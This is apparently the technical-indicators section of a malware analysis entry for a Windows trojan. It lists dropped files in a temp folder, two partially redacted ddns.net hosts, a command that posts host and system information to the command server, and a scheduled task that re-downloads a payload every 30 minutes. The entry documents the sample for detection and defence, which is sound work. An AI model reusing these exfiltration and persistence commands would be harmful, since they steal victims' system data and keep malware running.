Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im Cookie.exe
- %TEMP%\7ZipSfx.000\Cookies.cmd
- %TEMP%\7ZipSfx.000\Cookie.exe
- %TEMP%\7ZipSfx.000\ebwgCKZ
- %TEMP%\7ZipSfx.000\richtime.exe
- %APPDATA%\Microsoft\IE\ie_cash.exe
- 'mi######t-single.ddns.net':80
- http://mi######t-single.ddns.net/
- DNS ASK mi######t-single.ddns.net
- ClassName: '' WindowName: ''
- '%TEMP%\7ZipSfx.000\Cookie.exe' --post-data="versiya=arm_15.11&comp=CRNJEUFU&id=CRNJEUFU_88E6680F&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: ...
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\Cookies.cmd" "
- '<SYSTEM32>\cmd.exe' /c vol c:
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 30 /F /tn ie_cash_88E6680F_01 /tr "%APPDATA%\Microsoft\IE\ie_cash.exe -b -c -t 5 'http://bi####min.ddns.net/CRNJEUFU_88E6680F/setup.exe' -P '%HOMEPATH%'"